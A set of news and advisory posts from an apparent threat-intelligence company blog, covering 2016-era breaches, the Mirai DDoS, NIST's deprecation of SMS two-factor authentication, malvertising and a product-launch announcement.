Inc. Blog – Child Pornographers Hide in the Web’s Dark Corners. Intelliagg Is Helping Catch Them

When Intelliagg found evidence of crimes against children, it could have looked the other way. Instead, it volunteered to help bring the criminals to justice.

For most internet startups, “abuse” means users violating the terms of service by posting hate speech or sending spam or advertising adult services. But in some parts of the tech industry, the stakes are different. The cybersecurity firm Intelliagg didn’t set out to hunt down child abusers. But when the problem fell in its lap, the company’s staff didn’t feel like they could stand by and do nothing. Intelliagg didn’t just call the cops — the company also offered up its services to them, pro bono…….continue reading.

Vulnerability disclosure leads to stock price manipulation

Late last week a hedge fund by the name of Muddy Waters and information security company MedSec made a surprising maneuver. They shorted the stock of St Jude Medical after telling them of two vulnerabilities which St. Jude Medical said were non issues. After being told this, they shorted the stock and published their findings. The St. Jude Medical stock took a 10% tumble on Thursday and a further 2% before trading was halted. MW with MedSec made a tidy profit.

This is the first time we have seen vulnerabilities in cyber defenses being actively exploited to gain a market advantage by hurting a publicly traded company.

So considering the general path for disclosure is either tell the vendor and wait, or sell the vulnerabilities into the vulnerability market (if they can find a buyer) this shows a departure from the standard venues to people finding vulns and making a profit.

60 million accounts from dropbox hack has been dumped on the internet

On the 31st of august 60 million account details for online cloud storage provider Dropbox has now surfaced on the internet. The accounts were stolen during a previously disclosed breach in 2012, and Dropbox has already forced password resets earlier this week, previously it was not known how many users had been affected, and only now is it clear that it was the entire database at the time that was compromised.

Sources for various publications have received samples and in all the leak contains about 5GB of data and include the account details of 68,680,741 accounts including usernames, e-mail addresses and encrypted password hashes.

The data is legitimate, according to a senior Dropbox employees.

Earlier this week, Dropbox announced it was forcing password resets for a number of users after discovering a set of account details linked the 2012 data breach. Dropbox did not publish any figure on the number of resets performed. According to dropbox statement in 2012

Credential stuffing and resold accounts on the dark web

This month several databases including databases claiming to be from targeted attacks of companies like o2 and other providers has surfaced on the dark web. o2 is denying that there has been any data breach and are citing the cause as a likely incident of Credential stuffing. Credential stuffing is an attack where the attacker take previously known leaked credentials and cross reference them against other services. Many companies are now experiencing similar types of attacks where we have mega breaches and criminal organizations are working as fast as possible to reuse old credentials after the original breach is discovered so their hacking investment has not gone to waste and the maximum amount of value is extracted.

What can one do to protect yourself? Often it’s very difficult to stop this outright if a customers credentials are identical and you’re using traditional passwords for authentication. A great way to thwart these attacks is to turn on mandatory 2FA for your customers. A next step would be acquiring these breach lists and doing a internal comparison of customer passwords by hash, and forcing a password reset if you’re worried about two factor authentication running over a side channel. In summary just because a competitor or an unrelated company is compromised doesn’t mean it can’t affect you.

National Democratic party hacked and emails released to the public

This months Wikileaks have published internally sensitive documents that come from a hack that targeted the Democratic National Committee (DNC). This lead to the eventual resignation of the Chair Debbie Wasserman Schultz. CrowdStrike broke news that the Russians had hacked the Democratic National Convention email but not details of how the attribution was performed have been shared with the public. Researchers could not definitively find how the groups got into the system, but the typical way in for the groups is through carefully crafted deceptive emails, called “spearphishing,” that trick recipients into clicking malicious links.

At the same time a independent threat actor known as “Guccifier 2.0” as a homage to the independent Rumanian hacker “Guccifier” That now awaits sentencing for similar hacks in the U.S. claims responsibility for the attacks and has posted other documents claimed to be from the attack online on various forums. Sources close to Wikileaks seems to support this version. Weather the attack can be attributed to Russian Nation State attackers or independent adversaries is of little relevance. What matters, for the DNC hack, is that people learn the importance of end-to-end encryption via S/MIME or PGP for email, and people start focusing more on those problems.

SMS-based Two-Factor Authentication (2FA) has been declared insecure

Two-Factor Authentication or 2FA adds an extra layer of security by entering a random passcode sent to you via an SMS or call when you log on to your account. Two factor authentication via telephone text messages has up until today been one of the most common forms of 2FA. While 2FA tokens are used to deter attackers due to the need for real-time data from the potential victim, today’s malware is specifically designed to circumvent this security measure.

US National Institute of Standards and Technology (NIST) has released a new draft of its Digital Authentication Guideline that says SMS-based two-factor authentication should be banned in future due to security concerns. NIST says: “If the out of band verification is to be made using an SMS message on a public mobile telephone network, the verifier SHALL verify that the pre-registered telephone number being used is actually associated with a mobile network and not with a VoIP (or other software-based) service. It then sends the SMS message to the pre-registered telephone number. Changing the pre- registered telephone number SHALL NOT be possible without two-factor authentication at the time of the change. OOB [Out of band verification] using SMS is deprecated, and will no longer be allowed in future releases of this guidance.” This goes well in hand with a large number of reports that the end point devices might be under control of the attacker via malware. 

Large ddos attack affecting multiple clients

Large DDOS attack affecting Multiple Client

Update: The attack seems to have been resolved by the provider at 20.oo central european time.

Intelliagg have seen an increase in traffic related to the bot-net named “mirai” that comprises of hacked devices such as home routers and surveillance cameras and other “internet of thing” (iot) devices.

Today a large distributed denial of service attack have affected several of our clients. The attack is ongoing and has currently not been resolved.

What we know

The early research of the attack shows that the majority of the affected sites and clients have a tie to DYNDNS who reported the attack at 16.00 Central european time. 

It is unclear wether more DNS providers are targeted in the attack but given the initial research on some of the big sites that have gone down that is likely.

Intelliagg will continue to investigate and update information on this attack.

Who is affected

It is looking like the attack is persistent and have targeted the Core DNS service from a bot net with an so called DNS amplification attack. Initially it seemed to only affect .com addresses but we are now getting reports that .se addresses are affected. According to our reports so far it seems addresses are not affected.

Recommended action

If you are affected and know that you have as you dns provider we recommend to temporarily move DNS to a alternate provider or set up a temporary local DNS server. several of our clients have mitigated the attack by temporarily move the DNS resolution to amazon AWS.

For more information and updates

If you are affected have any questions or would like any advice on mitigation please send an e-mail to 

Malware in syndicated adverts

Over the last month we have seen a great increase in adversaries buying access to existing ad providers that are accepted by the large advertising syndicates and has been using these domains to serve targeted malware through main stream and well known media sites. This targeted malware seems to be originating from Russia and Eastern Europe.

Intelliagg Launches the deeplight engine


Intelliagg (Threat finder Ltd), provider of cyber threat intelligence services and software platforms for real-time cyber threat intelligence Intelligence, today announced it has completed the software integration after the acquisition of DARKSUM, Inc. a leading innovator in darknet collection and analytics. Under the terms of the agreement, Intelliagg has acquired all the assets, software, employees and intellectual property of DARKSUM for an undisclosed sum.

The combination of the DARKSUM and Intelliagg technologies revolutionizes the intelligence collection market by unifying world-class machine learning capabilities with complete darknet collection.

The Technology stack powering the new intelliagg service will be known as deep-light and will be available for licensing as well as powering the intelliagg managed services.


“Intelliagg built its reputation in security by enabling customers to effectively identify and respond to breaches and emerging threats. With this acquisition, our customers can now also better detect advanced threats found on the darknet – Breaches that are becoming more complex and severe with each passing day,” said Thomas Olofsson, co-founder of Intelliagg.

“With Deeplight, Intelliagg improves its capabilities in detecting and acting upon advanced threats by shining a light on those threat actors who are hiding on the darker areas of the net. By detecting and responding to known and unknown threats, and by providing a platform to detect, respond to, and automate actions, Intelliagg has further reinforced its position of moving its clients from a reactive to a proactive position”

“We founded DARKSUM with a vision to help clients be in a proactive stance when monitoring for threats found only in the dark web,” said Eric Michaud, CEO, DARKSUM. “By joining Intelliagg and applying their machine learning platform to our datasets we are able to better detect breaches and new threat actor behavior. DARKSUM has solved a problem that previously required significant manpower, expensive custom toolsets, and compute time. We are very excited to join the Intelliagg family and deliver new detection capabilities to customers.”

Key capabilities of the combination of the Deeplight solutions include the ability to:

Detect physical and cyber Threats against your organization

  • Continuous monitoring for and automatic detection of threats from private and open sources the use multi-domain analysis using machine learning.
  • Continuous monitoring of hundreds of thousands of darknet as well as open sources.
  • All events manually verified by skilled threat analysts

About Intelliagg

Intelliagg is a leading threat intelligence company working with organisations to control or evade data loss, reputational damage and targeted cyber crime through the provision of intelligence and automatic threat detection through machine learning.

The company provides a suite of professional and managed services that deal with cyber threat intelligence and incident response management.

Intelliagg was founded in London 2011 and is privately held by the founders.

The company’s founders had a vision to bridge the gap between technical cyber protection and theoretical risk assessment models with actionable threat intelligence.

For more information go to

JPEG image exploits found on most popular adult sites

There have been increased reports of JPEG malware, where malicious code can be inserted into what appears to be an innocuous file, with real jpeg files containing an image and designed to execute the code upon the opening of the file. The viewing of porn may not be allowed in your business, nor is it likely to be a comfortable topic you wish to openly discuss in your office.

However, businesses can’t escape the reality that porn sites get more visits per month than Netflix, Amazon and Twitter combined. The increased risk that malware on porn sites pose on businesses is no longer a topic businesses can afford to avoid. The chances of finding a porn site without images is about as likely coming across a text book without words, which makes it a perfect target for malware exploits hidden within image and video files.